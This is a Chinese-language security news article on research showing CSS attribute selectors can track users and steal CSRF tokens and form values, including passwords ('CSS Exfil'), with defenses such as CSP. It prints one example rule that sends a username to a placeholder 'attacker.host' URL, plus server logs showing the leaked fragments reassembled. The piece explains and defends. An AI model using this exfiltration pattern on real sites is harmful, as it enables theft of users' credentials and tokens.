CSS代码可能被用来收集敏感用户数据

2018-02-09 12:39:15来源:http://www.freebuf.com/articles/web/162445.html作者:FreeBuf人点击

分享


CSS不仅在网页展现时强大,在追踪用户时也能发挥作用。它能够追踪网站用户,从网页中提取和窃取数据,收集表单域中输入的数据(包括密码),甚至让暗网用户暴露身份。


在过去的一个月里,三个有趣的研究项目都把CSS作为攻击媒介,显示了这种看似无害的语言也能被用来针对用户。


使用CSS跟踪页面上的用户

关于这个主题的第一个项目是JanBöhmer的一个项目“Crooked Style Sheets”,这个项目提供了一个无JavaScript的跟踪方案,可以通过CSS代码的页面交互跟踪用户。


Böhmer表示,他可以跟踪用户何时悬停鼠标,何时点击链接,何时在输入字段中输入文本,以及收集大量真实的用户代理信息,即便用户使用假的UA也没有用。


使用CSS窃取CSRF token

与Böhmer的工作不同,安全研究人员Dylan Ayrey(XSSJacking作者)也在上周末发布了新的研究成果,展示攻击者如何滥用CSS来窃取CSRF(用户身份验证)token。


Ayrey的攻击只适用于在各种HTML页面元素的属性中存储CSRF令牌的严重错误的网站和应用程序,因此其范围非常有限。这种攻击可能很容易被网站/应用程序所有者击败,他们发现一种更安全的方式来验证用户,而不会在网页的源代码中倾销CSRF令牌。


Ayrey的技术依赖于在网页中注入CSS代码,使用CSS属性选择器每次猜解CSRF token的一个字母。


攻击需要10秒钟左右完成,甚至可以在不需要iframe的情况下工作,不需要持续流量的远程服务器也就没有机会提醒出现问题的用户。


CSS属性选择器的威胁不止于此

Ayrey的研究只是停留在表面。过去的一个月中,安全研究员Mike Gualtieri也一直在努力使用相同的技术,但不仅仅是窃取token。


Gualtieri研究的是如何使用CSS属性选择器来猜测留在HTML标签内的敏感内容。


研究人员能够利用这种方法收集在表单域中输入的敏感用户数据,包括密码字符串。


工作原理

Ayrey和Gualtieri的方法都利用了CSS属性选择器,属性选择器能让开发人员查询单个属性的页面HTML标记,并且匹配它们的值。


举个例子,下面的CSS代码将搜索页面中的“href”属性包含“facebook”字符串的链接元素(“a”),并将所有这些链接加上蓝色。


a[href*="facebook"] {
color: blue;
}

这些查询看似无害,但在研究人员看来可能被用来实施攻击。


这些查询可以拼接在一起,执行基本的字典暴力攻击,并尝试猜测属性的起始字母,然后将识别的字母添加到新的模式匹配语法中,从而攻击者可以猜解第二个,第三个等字母。


[attribute=value] [foo=bar] 选择foo =“bar”的所有元素
[attribute~=value] [foo~=bar] 选择所有包含单词“bar”的foo属性的元素
[attribute|=value] [foo|=bar] 选择所有具有以“bar”开头的foo属性值的元素
[attribute^=value] [foo^="bar"] 选择所有具有以“bar”开头的foo属性值的元素
[attribute$=value] [foo$="bar"] 选择所有具有以“bar”结尾的foo属性值的元素
[attribute*=value] [foo*="bar"] 选择所有包含子字符串“bar”的foo属性的元素

攻击者需要构造恶意HTTP请求,执行CSS代码选择器。


#username[value="ZeroC00L"] {
background:url("https://attacker.host/ZeroC00L");
}

攻击者只需要通过对服务器404的错误筛选,找出想要的结果。


127.0.0.1 - - [30/Jan/2018:11:09:35 -0500] "GET /00 HTTP/1.1" 404 22
127.0.0.1 - - [30/Jan/2018:11:09:35 -0500] "GET /0L HTTP/1.1" 404 22
127.0.0.1 - - [30/Jan/2018:11:09:36 -0500] "GET /Ze HTTP/1.1" 404 22
127.0.0.1 - - [30/Jan/2018:11:09:36 -0500] "GET /Z_ HTTP/1.1" 404 22
127.0.0.1 - - [30/Jan/2018:11:09:36 -0500] "GET /ro HTTP/1.1" 404 22
127.0.0.1 - - [30/Jan/2018:11:09:36 -0500] "GET /oC HTTP/1.1" 404 22
127.0.0.1 - - [30/Jan/2018:11:09:36 -0500] "GET /_L HTTP/1.1" 404 22
127.0.0.1 - - [30/Jan/2018:11:09:36 -0500] "GET /er HTTP/1.1" 404 22
127.0.0.1 - - [30/Jan/2018:11:09:36 -0500] "GET /C0 HTTP/1.1" 404 22

之后再把字符串组合成完整的数据


Z # Z_
Ze# Ze
Zer # er
Zero# ro
ZeroC # oC
ZeroC0# C0
ZeroC00 # 00
ZeroC00L# 0L _L

Ayrey和Gualtieri用了两种不同的方法进行攻击。 Ayrey一次猜测最后一个字母,而Gualtieri则通过多个猜测来重建字符串,最后将他们组合。


两种方法都有效。Ayrey的方法噪音较大,但可以很容易自动化,而Gualtieri的方法更快(也可以自动化),但在某些情况下会依赖于人来拼接字符串。


Gualtieri将此技术命名为CSS Exfil。但CSS Exfil只能在加载时窃取页面上的HTML属性,不能在初始页面加载后从动态注入的代码中窃取。 Gualtieri认为这不是大问题,他的研究提到攻击者可以有各种解决方法。


防御方式

防范CSS Exfil攻击可以分为两个层面。首先,网站和网络应用程序作者可以实施内容安全策略(CSP),防止攻击者从外部加载CSS代码。


其次,访客还可以安装Gualtieri的 Firefox 或 Chrome 扩展程序,它可以检测Gualtieri在他的研究中记录的所有类型的CSS Exfil攻击,并在执行之前重写恶意代码。


你可以访问这里的网页进行 测试 。


CSS Exfil并不是一项新技术,2016年的CureSec就曾经讨论过,但是在过去一个月中,这种攻击方法吸引了多位研究人员的目光。


* 参考来源: BleepingComputer ,作者Sphinx,转载注明来自Freebuf.COM


最新文章

123

最新摄影

闪念基因

微信扫一扫

第七城市微信公众平台